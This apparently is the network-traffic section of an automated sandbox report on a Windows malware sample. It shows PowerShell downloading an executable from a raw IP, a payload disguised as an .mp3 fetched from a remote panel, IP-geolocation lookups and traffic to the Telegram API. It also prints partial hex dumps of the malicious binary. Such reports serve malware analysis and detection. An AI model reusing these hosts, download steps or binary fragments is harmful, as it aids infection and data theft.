                                                                                                Jan 16, 2025 08:31:29.432734966 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:29.483329058 CET4992680192.168.2.5132.226.247.73
                                                                                                Jan 16, 2025 08:31:30.155885935 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.155951023 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:31:30.157383919 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:31:30.157392025 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.157696009 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.159159899 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:31:30.199328899 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.199559927 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:31:30.199579000 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.638686895 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.638767958 CET44349976149.154.167.220192.168.2.5
                                                                                                Jan 16, 2025 08:31:30.638834000 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:31:30.639285088 CET49976443192.168.2.5149.154.167.220
                                                                                                Jan 16, 2025 08:32:07.923089981 CET8049752193.122.6.168192.168.2.5
                                                                                                Jan 16, 2025 08:32:07.923228979 CET4975280192.168.2.5193.122.6.168
                                                                                                Jan 16, 2025 08:32:34.429522038 CET8049926132.226.247.73192.168.2.5
                                                                                                Jan 16, 2025 08:32:34.429615021 CET4992680192.168.2.5132.226.247.73
                                                                                                Jan 16, 2025 08:32:37.515034914 CET4975280192.168.2.5193.122.6.168
                                                                                                Jan 16, 2025 08:32:37.519968033 CET8049752193.122.6.168192.168.2.5
                                                                                                Jan 16, 2025 08:33:04.046252966 CET4992680192.168.2.5132.226.247.73
                                                                                                Jan 16, 2025 08:33:04.051212072 CET8049926132.226.247.73192.168.2.5

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 16, 2025 08:30:41.033930063 CET5039053192.168.2.51.1.1.1
                                                                                                Jan 16, 2025 08:30:41.045711040 CET53503901.1.1.1192.168.2.5
                                                                                                Jan 16, 2025 08:30:55.923857927 CET6070053192.168.2.51.1.1.1
                                                                                                Jan 16, 2025 08:30:55.930682898 CET53607001.1.1.1192.168.2.5
                                                                                                Jan 16, 2025 08:30:56.797152996 CET5215453192.168.2.51.1.1.1
                                                                                                Jan 16, 2025 08:30:56.806540966 CET53521541.1.1.1192.168.2.5
                                                                                                Jan 16, 2025 08:31:02.926290989 CET5529453192.168.2.51.1.1.1
                                                                                                Jan 16, 2025 08:31:02.934051037 CET53552941.1.1.1192.168.2.5
                                                                                                Jan 16, 2025 08:31:22.275947094 CET5916853192.168.2.51.1.1.1
                                                                                                Jan 16, 2025 08:31:22.379914999 CET53591681.1.1.1192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 16, 2025 08:30:41.033930063 CET192.168.2.51.1.1.10x420eStandard query (0)az-ka.comA (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.923857927 CET192.168.2.51.1.1.10x1cbaStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.797152996 CET192.168.2.51.1.1.10x90aaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:02.926290989 CET192.168.2.51.1.1.10x3ac2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.275947094 CET192.168.2.51.1.1.10xce75Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 16, 2025 08:30:41.045711040 CET1.1.1.1192.168.2.50x420eNo error (0)az-ka.com166.62.28.147A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:55.930682898 CET1.1.1.1192.168.2.50x1cbaNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:30:56.806540966 CET1.1.1.1192.168.2.50x90aaNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:02.934051037 CET1.1.1.1192.168.2.50x3ac2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                Jan 16, 2025 08:31:22.379914999 CET1.1.1.1192.168.2.50xce75No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • az-ka.com
                                                                                                • reallyfreegeoip.org
                                                                                                • api.telegram.org
                                                                                                • 87.120.113.91
                                                                                                • checkip.dyndns.org

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54970587.120.113.91806392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 16, 2025 08:30:39.235419035 CET168OUTGET /chrome.exe HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: 87.120.113.91
                                                                                                Connection: Keep-Alive
                                                                                                Jan 16, 2025 08:30:39.842345953 CET1236INHTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Last-Modified: Tue, 03 Sep 2024 20:32:05 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "f082e65640feda1:0"
                                                                                                Server: Microsoft-IIS/10.0
                                                                                                Date: Thu, 16 Jan 2025 07:30:39 GMT
                                                                                                Content-Length: 188928
                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 29 88 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 d8 02 00 00 08 00 00 00 00 00 00 3e f6 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec f5 02 00 4f 00 00 00 00 00 03 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL/)g> @ @`O H.textD `.rsrc@@.reloc @B HXf(*(T*{*{*"}*{*"}*{*"}*Fs%o*(&o+o\o+o]*(s^%s(o&o\*(9 rprp(((_s`z*6{*"(*|(t9|(u*(v*{*"}*{*"}*{*"}*{ *"} *{!*"}!*{"*"}"*{#*"}#*2|(w*{
                                                                                                Jan 16, 2025 08:30:39.842361927 CET224INData Raw: 24 00 00 04 2a 32 02 7c 09 00 00 04 28 78 00 00 0a 2a 1e 02 7b 25 00 00 04 2a 32 02 7c 11 00 00 04 28 79 00 00 0a 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 1e 02 7b 27 00 00 04 2a 22 02 03 7d 27 00 00 04 2a 1e 02 7b 28 00 00 04 2a 7a
                                                                                                Data Ascii: $*2|(x*{%*2|(y*{&*"}&*{'*"}'*{(*z|(z9|({**z|(z9|({**{*{)*"})*{**"}**{+*"}+*{,*"},*{-
                                                                                                Jan 16, 2025 08:30:39.842499018 CET1236INData Raw: 00 04 2a 22 02 03 7d 2d 00 00 04 2a 3e 02 7c 0d 00 00 04 28 7c 00 00 0a 16 fe 02 2a 7a 03 3a 0b 00 00 00 72 cf 02 00 70 73 5b 00 00 0a 7a 02 7c 0a 00 00 04 03 28 7d 00 00 0a 2a 9e 02 7c 0a 00 00 04 28 74 00 00 0a 3a 0b 00 00 00 72 df 02 00 70 73
                                                                                                Data Ascii: *"}-*>|(|*z:rps[z|(}*|(t:rps`z|(~*z:rps[z|(*|(:rps`z|(*(9rps[z(m(+ooZ*:r8ps[z|
                                                                                                Jan 16, 2025 08:30:39.842511892 CET1236INData Raw: 00 00 04 2a 0a 16 2a 9e 03 02 28 a6 00 00 06 6f 8e 00 00 06 26 03 72 6e 0c 00 70 6f 8f 00 00 06 26 03 02 28 a8 00 00 06 6f 8e 00 00 06 26 2a 5e 72 72 0c 00 70 02 28 a6 00 00 06 02 28 a8 00 00 06 28 8a 00 00 0a 2a 1e 02 7b 47 00 00 04 2a 22 02 03
                                                                                                Data Ascii: **(o&rnpo&(o&*^rrp(((*{G*"}G*{H*"}H*{I*"}I*rp(((((*Zs%}N%}P*Zs%}W%}Y*@(*rp(s
                                                                                                Jan 16, 2025 08:30:39.842524052 CET1236INData Raw: 2a 46 72 b7 16 00 70 02 28 22 01 00 06 28 8d 00 00 0a 2a 1e 02 7b 8e 00 00 04 2a 22 02 03 7d 8e 00 00 04 2a 9a 03 72 58 17 00 70 6f 8f 00 00 06 6f 91 00 00 06 26 03 02 28 30 01 00 06 6f 8e 00 00 06 26 03 6f 90 00 00 06 26 2a 1e 02 7b 8f 00 00 04
                                                                                                Data Ascii: *Frp("(*{*"}*rXpoo&(0o&o&*{*"}*{*"}*"oI*^rfp(5(7(**(@*.(@&*j(5u%:&*o*{*"}*j(Bo&rpo&*F{
                                                                                                Jan 16, 2025 08:30:39.842535019 CET1236INData Raw: 03 02 28 b4 01 00 06 17 6f 4b 00 00 06 14 2a 9a 03 72 3d 1d 00 70 6f 8f 00 00 06 6f 91 00 00 06 26 03 02 28 b4 01 00 06 6f 8e 00 00 06 26 03 6f 90 00 00 06 26 2a 1e 02 7b b6 00 00 04 2a 22 02 03 7d b6 00 00 04 2a 52 03 19 6f 39 00 00 06 03 02 28
                                                                                                Data Ascii: (oK*r=poo&(o&o&*{*"}*Ro9(oT*rOpoo&(o&o&*>(}*B(}*{*b(osyo\*.(*(:rWps[z}
                                                                                                Jan 16, 2025 08:30:39.842546940 CET1236INData Raw: 2a 1e 02 7b de 00 00 04 2a 22 02 03 7d de 00 00 04 2a ea 03 72 51 22 00 70 6f 8f 00 00 06 6f 91 00 00 06 26 03 02 28 0f 02 00 06 6f 8e 00 00 06 26 03 6f 90 00 00 06 26 03 02 28 11 02 00 06 6f 8e 00 00 06 26 03 6f 92 00 00 06 26 2a 8a 02 28 54 00
                                                                                                Data Ascii: *{*"}*rQ"poo&(o&o&(o&o&*(TN(A(tN}*(TP(A(tP}*(TR(A(tR}*(TT(A(tT}*(T%:&r#ps[
                                                                                                Jan 16, 2025 08:30:39.842557907 CET1236INData Raw: 0a 7e 03 01 00 04 25 3a 17 00 00 00 26 7e 02 01 00 04 fe 06 c9 02 00 06 73 50 01 00 0a 25 80 03 01 00 04 28 06 00 00 2b 28 07 00 00 2b 2a 72 02 28 cb 02 00 06 02 28 9d 02 00 06 05 0e 04 0e 05 73 c2 02 00 06 6f 52 01 00 0a 2a 22 02 03 6f a7 02 00
                                                                                                Data Ascii: ~%:&~sP%(+(+*r((soR*"o*N((oS*(~%:&~s]%(+(+o^N*(*>s%(*s_z>}(*>f}*{*{
                                                                                                Jan 16, 2025 08:30:39.842570066 CET1236INData Raw: 01 00 04 6f 9a 01 00 0a 2a 3a 02 7b 2c 01 00 04 0e 04 6f 9b 01 00 0a 2a 36 02 7b 2b 01 00 04 03 6f 5f 02 00 06 2a 1e 02 7b 3b 01 00 04 2a 1e 02 7b 3c 01 00 04 2a 22 02 03 7d 3c 01 00 04 2a 72 02 7b 32 01 00 04 39 0f 00 00 00 02 7b 32 01 00 04 6f
                                                                                                Data Ascii: o*:{,o*6{+o_*{;*{<*"}<*r{29{2o**sh*f8(b{/(g-**F_;(**z([:(:-**2(Hz*B ;**:}Aof*2{AoI*2{
                                                                                                Jan 16, 2025 08:30:39.842581034 CET1236INData Raw: 28 e6 03 00 06 40 22 00 00 00 02 28 e8 03 00 06 0f 01 28 e8 03 00 06 40 10 00 00 00 02 28 ea 03 00 06 0f 01 28 ea 03 00 06 fe 01 2a 16 2a 8a 03 3a 02 00 00 00 16 2a 03 75 83 00 00 02 39 0d 00 00 00 02 03 a5 83 00 00 02 28 f0 03 00 06 2a 16 2a 1e
                                                                                                Data Ascii: (@"((@((**:*u9(**(*&(*2(*:sv*Z}{}|}}*rHp{{{|{}(*:*u9(**&(*2
                                                                                                Jan 16, 2025 08:30:39.847356081 CET1236INData Raw: 0a 2a 5a 0f 01 72 eb 4d 00 70 04 28 0b 02 00 0a 18 1f 20 6f 0c 02 00 0a 2a 3a 0f 01 72 f1 4d 00 70 04 28 0b 02 00 0a 2a 3a 0f 01 72 f7 4d 00 70 04 28 0b 02 00 0a 2a 3a 0f 01 72 fd 4d 00 70 04 28 0b 02 00 0a 2a 3a 0f 01 72 03 4e 00 70 04 28 0b 02
                                                                                                Data Ascii: *ZrMp( o*:rMp(*:rMp(*:rMp(*:rNp(*:rNp(*:rNp(*:rNp(*:rNp(*:rNp(*:r'Np(*r2p*R{ooQ*:*r/Nps~o*>:


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.549752193.122.6.168802072C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 16, 2025 08:30:55.943897009 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Jan 16, 2025 08:30:56.600255966 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:30:56 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                Jan 16, 2025 08:30:56.604615927 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Jan 16, 2025 08:30:56.795099974 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:30:56 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                Jan 16, 2025 08:31:02.732912064 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Jan 16, 2025 08:31:02.923280001 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:02 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549926132.226.247.73805712C:\Users\user\AppData\Roaming\TypeId.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 16, 2025 08:31:22.391797066 CET151OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Connection: Keep-Alive
                                                                                                Jan 16, 2025 08:31:23.074336052 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:22 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                Jan 16, 2025 08:31:23.095927000 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Jan 16, 2025 08:31:23.305689096 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:23 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                Jan 16, 2025 08:31:29.218259096 CET127OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                Host: checkip.dyndns.org
                                                                                                Jan 16, 2025 08:31:29.428869963 CET273INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:31:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 104
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.549706166.62.28.1474433136C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-16 07:30:42 UTC210OUTGET /panel/uploads/Cicycmiv.mp3 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: az-ka.com
                                                                                                Connection: Keep-Alive
                                                                                                2025-01-16 07:30:42 UTC296INHTTP/1.1 200 OK
                                                                                                Date: Thu, 16 Jan 2025 07:30:42 GMT
                                                                                                Server: Apache
                                                                                                Upgrade: h2,h2c
                                                                                                Connection: Upgrade, close
                                                                                                Last-Modified: Wed, 15 Jan 2025 21:31:18 GMT
                                                                                                ETag: "68019e-119a08-62bc565e18a6c"
                                                                                                Accept-Ranges: bytes
                                                                                                Content-Length: 1153544
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Type: audio/mpeg
                                                                                                2025-01-16 07:30:42 UTC7896INData Raw: 50 11 6a 49 9a 74 8a b6 13 0e d1 30 71 b9 a5 a2 8c 29 91 2b 6a 2b fc 40 26 0b 1d 79 1b 83 9b 50 68 05 dc 92 0b 5b db 7b 85 58 34 65 b5 77 a8 d2 cb 85 39 fc f8 92 b2 3c 78 3f 97 11 f5 f2 69 8c 9b 54 f9 24 fc 72 73 06 29 40 aa bd 76 78 25 d9 fe a4 d8 d5 01 30 5d 0f d0 65 99 4f 8e 26 14 1e 4c 8e 77 fe a3 da 94 50 13 99 7f 05 0f 1f 01 a4 0d 15 2e eb b4 ba b8 f1 96 65 0b 24 f4 75 2b 84 09 8d af a9 9d 14 ca 8d 96 bb 6f 90 af b7 e2 c2 bb c2 6e c3 26 f1 b7 df 62 92 6c e4 60 a0 4b 4d 2d 0c 0e 18 6d 07 6b 19 db 5a 37 bc 95 fd 1f a6 8c a5 fe 7a f1 96 f1 1b d9 22 63 13 10 a5 23 c8 70 a5 e0 26 95 7b b0 fb 35 2c d1 da d7 48 7d fb 60 a7 fc 1d ea 66 de a3 b3 a3 ef fa 85 bd 2a 52 9e 37 4c 2e 0e 56 93 aa 3f 55 f0 4d ed 64 07 53 bc 32 d6 20 0e dd 77 4d 34 33 eb 84 c1 de c3
                                                                                                Data Ascii: PjIt0q)+j+@&yPh[{X4ew9<x?iT$rs)@vx%0]eO&LwP.e$u+on&bl`KM-mkZ7z"c#p&{5,H}`f*R7L.V?UMdS2 wM43
                                                                                                2025-01-16 07:30:42 UTC8000INData Raw: e7 ac e0 df 6d 61 9f 8e df f1 85 f4 77 bb 63 27 a3 7f f9 87 45 97 92 a3 42 e7 ea 26 c8 18 d1 69 8f 95 bc 11 2c 8e 6a fc 50 77 e2 f3 ad 44 3d ab 68 46 10 86 e5 d5 d7 9d 29 9c 9e a4 62 8b 5d eb bb 40 66 0d de 1b 81 a6 d4 59 1e 8a a5 69 9e 3a 3a fa 30 ca ae 63 9e c1 86 69 a6 04 e4 56 fd 82 5c b7 44 ae 48 4f 4f d5 9e 28 c8 71 24 7b ee 9b 42 4b 9d 97 69 92 bc 4e fe 5e ba 9d 26 a2 39 23 3b a6 ce 3f 6d 10 94 d5 37 ba 9f 43 4d 30 c0 19 64 e4 53 75 9e 53 49 54 20 34 30 20 16 73 04 78 1a ef 83 50 5e 8d e0 60 e8 77 b3 b5 19 05 8c af 70 70 27 67 32 35 fa af 88 6b 71 ee db 36 38 a2 27 e1 3d 83 f3 a3 52 1c 14 b2 c6 81 50 f6 15 6c fd de 3d b6 72 26 e0 ea d8 f1 dc 0e cf ba 88 0c 08 8d 11 02 13 46 4a b9 91 7e db 88 b8 15 5e 91 f2 a7 de fc f4 1f 07 8f 97 dc a5 71 2f 75 8f
                                                                                                Data Ascii: mawc'EB&i,jPwD=hF)b]@fYi::0ciV\DHOO(q${BKiN^&9#;?m7CM0dSuSIT 40 sxP^`wpp'g25kq68'=RPl=r&FJ~^q/u
